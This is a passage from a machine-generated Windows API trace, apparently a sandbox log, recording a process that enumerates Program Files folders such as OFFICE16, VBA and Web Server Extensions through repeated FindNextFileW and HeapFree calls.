hHeap=0x470000) returned 1 [0317.533] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8dd674, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ole db", cAlternateFileName="OLEDB~1")) returned 1 [0317.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.533] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8dd674, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ole db", cAlternateFileName="OLEDB~1")) returned 0 [0317.533] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0317.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0317.535] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf23b4040, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf23b4040, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SYSTEM", cAlternateFileName="")) returned 0 [0317.535] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0317.535] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.536] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesCommonX86", cAlternateFileName="PROGRA~4")) returned 1 [0317.539] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.539] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefcf5b24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0317.540] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.540] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e56af1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1e56af1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1031", cAlternateFileName="")) returned 1 [0317.540] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.540] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0501a67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0501a67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0501a67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 1 [0317.541] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.541] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0317.541] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.541] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6296213, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1040", cAlternateFileName="")) returned 1 [0317.541] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.541] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1041", cAlternateFileName="")) returned 1 [0317.590] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.591] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1329a43, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1329a43, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1042", cAlternateFileName="")) returned 1 [0317.591] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.591] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b81e2e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b81e2e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1046", cAlternateFileName="")) returned 1 [0317.591] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.591] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="1049", cAlternateFileName="")) returned 1 [0317.592] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.592] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefcf5b24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefcf5b24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefcf5b24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="2052", cAlternateFileName="")) returned 1 [0317.592] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.592] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd68243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd68243, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0317.592] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.593] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd68243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd68243, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 0 [0317.593] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0317.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.593] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc26f8376, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x28577965, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x28577965, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0317.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.594] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf63ed72c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf63ed72c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6a7bf80, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="APDEA0~1.DLL")) returned 1 [0317.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.595] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2d86b0f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2d86b0f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2d86b0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0317.596] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.596] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x453c2a7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x285ea0a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43cea0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="mfc140u.dll", cAlternateFileName="")) returned 1 [0317.597] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.597] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd8e49f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Portal", cAlternateFileName="")) returned 1 [0317.597] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.597] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x250c0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PortalConnectCore.dll", cAlternateFileName="PORTAL~1.DLL")) returned 1 [0317.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.598] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc968bf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc968bf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0317.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.598] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc968bf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc968bf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc968bf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="VBA7.1", cAlternateFileName="")) returned 1 [0317.601] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0317.601] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc968bf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0317.601] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0317.601] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.601] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc968bf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc968bf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc968bf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="VBA7.1", cAlternateFileName="")) returned 0 [0317.601] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0317.601] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.601] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0317.602] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0317.602] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd7bf89, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd7bf89, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0317.602] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0317.602] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.602] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="16", cAlternateFileName="")) returned 0 [0317.602] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0317.602] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.602] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0317.603] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0317.603] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.042] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System", cAlternateFileName="")) returned 1 [0318.406] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.407] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7b78b8d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ole db", cAlternateFileName="OLEDB~1")) returned 0 [0318.407] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0318.407] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0318.409] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf21ea38b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf21ea38b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System", cAlternateFileName="")) returned 0 [0318.409] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0318.409] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0318.409] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2e11c27d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e11c27d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesX64", cAlternateFileName="PROGRA~1")) returned 1 [0319.228] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.228] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2a7e39eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ae4bf10, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17beb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbghelp.dll", cAlternateFileName="")) returned 1 [0319.229] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0319.229] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8e69c | out: lpFindFileData=0x2e8e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee45f66d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0319.229] FindClose (in: hFindFile=0x3948828 | out: hFindFile=0x3948828) returned 1 [0319.229] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.229] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa50bd2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b050, dwReserved0=0x0, dwReserved1=0x0, cFileName="SQLDumper.exe", cAlternateFileName="SQLDUM~1.EXE")) returned 1 [0319.230] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.230] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ae4bf10, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ae4bf10, 